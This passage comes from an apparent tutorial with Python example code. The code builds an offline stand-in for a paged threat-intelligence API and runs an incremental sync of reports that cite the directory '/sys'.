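    {"id": "report--00000000-0000-4000-8000-000000000002", "type": "report", "published": "2025-07-20T09:00:00Z"},
    {"id": "report--00000000-0000-4000-8000-000000000003", "type": "report", "published": "2025-06-30T15:30:00Z"},
]


def fake_fetcher(scos: list, reports: list, page_size: int = 2) -> Fetcher:
    """Offline stand-in for http_fetcher: contains-match on /scos/, paged output."""
    def fetch(url: str) -> dict:
        parts = urllib.parse.urlsplit(url)
        q = urllib.parse.parse_qs(parts.query)  # also decodes %2Fsys -> /sys
        page = int(q.get("page", ["1"])[0])
        wanted = q.get("types", [""])[0].split(",")
        if parts.path.endswith("/objects/scos/"):
            pool = [o for o in scos if o["type"] in wanted
                    and q["value"][0] in o.get(VALUE_PROPERTY[o["type"]], "")]
        elif parts.path.endswith("/bundle/"):
            pool = [o for o in reports if o["type"] in wanted]
        else:
            raise ValueError(f"unexpected URL in example: {url}")
        chunk = pool[(page - 1) * page_size: page * page_size]
        return {"page_size": page_size, "page_number": page, "page_results_count": len(chunk),
                "total_results_count": len(pool), "objects": chunk}
    return fetch


if __name__ == "__main__":
    state: dict = {}
    fetch = fake_fetcher(SAMPLE_SCOS, SAMPLE_REPORTS)
    print("first run :", sorted(sync(fetch, "directory", "/sys", state)))
    # A new post citing /sys appears between runs; only it should come back.
    SAMPLE_REPORTS.append({"id": "report--00000000-0000-4000-8000-000000000004",
                           "type": "report", "published": "2025-08-01T08:00:00Z"})
    print("second run:", sorted(sync(fetch, "directory", "/sys", state)))
```

Swap `fake_fetcher(...)` for `http_fetcher("YOUR-KEY")` to run it against the live API; the rest is unchanged. The page size of 2 in the stand-in is deliberately small so the paging loop is exercised on three reports; the live endpoint pages at 50, as the responses above show.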